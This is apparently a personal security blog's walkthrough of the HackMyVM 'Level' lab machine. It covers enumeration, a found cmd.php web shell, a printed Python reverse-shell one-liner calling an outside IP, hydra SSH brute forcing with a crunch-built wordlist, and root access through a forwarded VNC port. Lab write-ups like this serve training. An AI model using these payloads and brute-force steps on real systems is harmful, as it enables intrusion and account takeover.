Muzec's Cyber Security Blog

Hack. Sleep. Repeat

View on GitHub

Enumeration With Nmap

We always start with an nmap scan…..

Nmap -sC -sV -p- -oA nmap <Target-IP> -vv

# Nmap 7.91 scan initiated Tue Nov  2 15:05:34 2021 as: nmap -sC -sV -p- -oA nmap -vv 172.16.109.148
Nmap scan report for Level (172.16.109.148)
Host is up, received syn-ack (0.00018s latency).
Scanned at 2021-11-02 15:05:36 WAT for 13s
Not shown: 65530 closed ports
Reason: 65530 conn-refused
PORT      STATE SERVICE     REASON  VERSION
21/tcp    open  ftp         syn-ack vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:172.16.109.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 17
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp    open  http        syn-ack Apache httpd 2.4.38 ((Debian))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp   open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn syn-ack Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
65000/tcp open  ssh         syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 e0:e7:a1:e4:f8:6f:ce:9f:e5:b8:61:a0:83:e8:e4:77 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCSuyQPkNmtquTSG9jsVp6z8SzyaczxGowK1kL9qtfhRbgepfU68kcXBTucWUcmxCw1ViwPbiArKccPV6JDYkRLe840/+uxDShv6n0Bj6SZa0MncEKAoal4gxgdV8Ojlh35eIGmYJe5HAvD7HXSKJlSU08Bp2QKh/9PCSik9avc+b/W5P8cyXdzds7p6KbmEPSViUrxdhb3Bo0b3ayYWHwXCwHMq39mdW8mqXCy9bJ0tIibW9WunyUQhfqSbmSRQhsZ2w0IdxWCdIr71O/sPcrL9JRJCu61ZXIlj41MjPqZZQtEPkG9LGVn/I2GCe67Kyl4HamVyQ+uOVGTGJCqDNkZ
|   256 69:6a:91:6b:bb:bf:60:55:dc:a3:0b:8f:53:b7:83:7b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLnIrruWMPYS7KFgoi/AVk2WCw79q7t1HPy57cw2SsmR5+tPMLWsGi1MmjKAdwMghv6gFoAgT3ca4ZFO0/nh7l0=
|   256 8e:92:3d:35:d2:25:4e:e2:f4:1e:21:70:56:56:94:e4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAII+Brt0al7iE9d14a4eGYjYmwYWLu0pDGJ0UQlec0HWj
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -20m01s, deviation: 34m37s, median: -2s
| nbstat: NetBIOS name: LEVEL, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   LEVEL<00>            Flags: <unique><active>
|   LEVEL<03>            Flags: <unique><active>
|   LEVEL<20>            Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 23984/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 63689/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 29708/udp): CLEAN (Failed to receive data)
|   Check 4 (port 33592/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: level
|   NetBIOS computer name: LEVEL\x00
|   Domain name: \x00
|   FQDN: level
|_  System time: 2021-11-02T15:05:47+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-11-02T14:05:47
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov  2 15:05:49 2021 -- 1 IP address (1 host up) scanned in 15.09 seconds

So much information man let break it down.

21 - FTP - We have anonymous login allowed
80 - HTTP - Running apache webserver 2.4.38 ((Debian))
139 - NETBIOS-SSN - Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445 - NETBIOS-SSN - Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
65000 - SSH -  OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

We are having 5 open ports which cool i guess the more the ports the more the enumeration to be carried out yes man we are hitting all ports starting from the top.

Enumeration On Port 21 FTP

┌──(muzec㉿Muzec-Security)-[~/Documents/HackMyVm/level]
└─$ ftp 172.16.109.148
Connected to 172.16.109.148.
220 (vsFTPd 3.0.3)
Name (172.16.109.148:muzec): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        115          4096 Jan 02  2021 .
drwxr-xr-x    2 0        115          4096 Jan 02  2021 ..
226 Directory send OK.
ftp> 

But seems the FTP is empty with no files ahhhh it ok let move forward.

Enumeration On Port 139,445 SMB

┌──(muzec㉿Muzec-Security)-[~/Documents/HackMyVm/level]
└─$ smbclient -L //172.16.109.148/ -N      

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
SMB1 disabled -- no workgroup available

Dead end also we have no shares to access let run enum4linux to gather some information man.

image

Not to much information just some usernames some default and a valid one one i guess not wasting to much of time let move forward.

Enumeration On Port 80 HTTP

image

I have the habit of running dirbuster on any webserver am testing first to burst for some hidden fast directories.

image

---- Scanning URL: http://172.16.109.148/ ----
+ http://172.16.109.148/index.html (CODE:200|SIZE:8)                                                                                                                  
+ http://172.16.109.148/robots.txt (CODE:200|SIZE:370)                                                                                                                
+ http://172.16.109.148/server-status (CODE:403|SIZE:279)

Let check what we have on robots.txt.

image

Directories listed on robots.txt are all rabbit hole should have gotten it in dirbuster result when we burst for directories.

image

But seems we still have a lot to see in the robots.txt file strolling down a bit and we found something interesting a Brainfuck language.

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>+++++++++++++++++.>>++++++++.-------.+++++++++++++++++.-----------------.+++++++.++++++++.-----.+++.+++++++.

image

A secret directory cool let browse it.

image

Hehehehe we found a wordlist for directory brute forcing.

image

So i wget it onto my machine now let hit gobuster to brute force directories.

┌──(muzec㉿Muzec-Security)-[~/Documents/HackMyVm/level]
└─$ gobuster dir -u http://172.16.109.148 -w leveltory-list-2.3-medium.txt -x php,phtml,html,txt,old
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.16.109.148
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                leveltory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,phtml,html,txt,old
[+] Timeout:                 10s
===============================================================
2021/11/03 10:42:45 Starting gobuster in directory enumeration mode
===============================================================
/Level2021            (Status: 301) [Size: 320] [--> http://172.16.109.148/Level2021/]
                                                                                      
===============================================================
2021/11/03 10:42:57 Finished
===============================================================

Let browser it and see what we have.

image

But it was blank checking source nothing let brute force the endpoint to see if we have more directories hidden .

┌──(muzec㉿Muzec-Security)-[~/Documents/HackMyVm/level]
└─$ gobuster dir -u http://172.16.109.148/Level2021/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,phtml,html,txt,old
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.16.109.148/Level2021/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,phtml,html,txt,old
[+] Timeout:                 10s
===============================================================
2021/11/03 10:49:26 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 1]
/cmd.php              (Status: 200) [Size: 145]

Boom let browse through it and i got an error.

image

 Warning: shell_exec(): Cannot execute a blank command in /var/www/html/Level2021/cmd.php on line 2

seems we can execute a command let try it.

image

Boom we can execute a command is cool let get a reverse shell back to us.

Shell As WWW-DATA

Let confirm which python is running on the target.

image

Payload to get a reverse shell;

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

image

Netcat listener ready now let run it and checking back our ncat listener and we have shell.

image

Now let spawn a tty shell.

┌──(muzec㉿Muzec-Security)-[~/Documents/HackMyVm/level]
└─$ nc -nvlp 1337                                                                             
listening on [any] 1337 ...
connect to [172.16.109.1] from (UNKNOWN) [172.16.109.148] 44982
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn ("/bin/bash")'
www-data@Level:/var/www/html/Level2021$ ^Z
zsh: suspended  nc -nvlp 1337
                                                                                                                                                                       
┌──(muzec㉿Muzec-Security)-[~/Documents/HackMyVm/level]
└─$ stty raw -echo; fg                                                                                                                                       148 ⨯ 1 ⚙
[1]  + continued  nc -nvlp 1337

www-data@Level:/var/www/html/Level2021$ stty rows 17 cols 190
www-data@Level:/var/www/html/Level2021$ export TERM=xterm
www-data@Level:/var/www/html/Level2021$ 
python -c 'import pty; pty.spawn ("/bin/bash")'
Ctrl Z
stty raw -echo; fg 
enter
enter
stty rows 17 cols 190
export TERM=xterm

Now we have a stable shell let gather more information checking the passwd file to confirm how many users we have on the target.

image

We have only one user which we found when enumerating SMB if we can recall now let dig more.

image

Ahhh yes we have no access to the home directory of the user one and seems we have a secret file left for us let cat it.

image

Smooth great time to create a custom wordlist with the help of crunch tools.

┌──(muzec㉿Muzec-Security)-[~/Documents/HackMyVm/level]
└─$ crunch 3 3 0123456789 > level.txt
Crunch will now generate the following amount of data: 4000 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 1000

So with the help of crunch i was able to generate the following number of lines: 1000 with random combination with minimum 3 and maximum 3 .

image

Now let use a simple bash script to generate our wordlists.

#!/bin/bash
#author:- Muzec

for x in $(cat level.txt); 
        do echo "0n30n3"$x  >> level1.txt ;done

image

We have our wordlist ready now hit SSH.

Enumeration On Port 65000 SSH

Brute forcing SSH using hydra with our wordlist we just created.

┌──(muzec㉿Muzec-Security)-[~/Documents/HackMyVm/level]
└─$ hydra -l one -P level1.txt ssh://172.16.109.148:65000
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-03 12:20:13
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1000 login tries (l:1/p:1000), ~63 tries per task
[DATA] attacking ssh://172.16.109.148:65000/
[STATUS] 176.00 tries/min, 176 tries in 00:01h, 824 to do in 00:05h, 16 active
[STATUS] 112.00 tries/min, 336 tries in 00:03h, 664 to do in 00:06h, 16 active
[65000][ssh] host: 172.16.109.148   login: one   password: 0n30n3666
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-03 12:26:25

Boom we have the right credentials now let log in SSH.

SSH as User One

image

We are in and we have user.txt.

image

Privilege Escalation

First thing first let check sudo -l .

image

Nah no Sudo let check SUID .

one@Level:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/su
/usr/bin/umount
/usr/bin/chsh
one@Level:~$ 

Nothing on SUID also let check if we have any ports running locally.

image

Interesting we have VNC port open locally on the target we can confirm it let port forward to our machine.

Port Forwarding

┌──(muzec㉿Muzec-Security)-[~/Documents/HackMyVm/level]
└─$ ssh -L 5901:localhost:5901 one@172.16.109.148 -p65000

image

┌──(muzec㉿Muzec-Security)-[~/Documents/HackMyVm/level]
└─$ nmap -sV -sC localhost -p5901
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-03 12:55 WAT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000072s latency).
Other addresses for localhost (not scanned): ::1

PORT     STATE SERVICE VERSION
5901/tcp open  vnc     VNC (protocol 3.3; Locked out)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.53 seconds

But seems we need a password to be able to accesss VNC let go back to the target to enumerate more.

image

We found a hidden directory with ... let check it out .

image

Possible our way to get access to the VNC let give it a try so i transfer the file to my machine.

┌──(muzec㉿Muzec-Security)-[~/Documents/HackMyVm/level]
└─$ vncviewer localhost:5901 -p remote_level
Connected to RFB server, using protocol version 3.8
Performing standard VNC authentication
Authentication successful
Desktop name "Level:1 (root)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

image

Using remote_level file and boom we are in with a root shell.

We are root and done.

Greeting From Muzec



Back To Home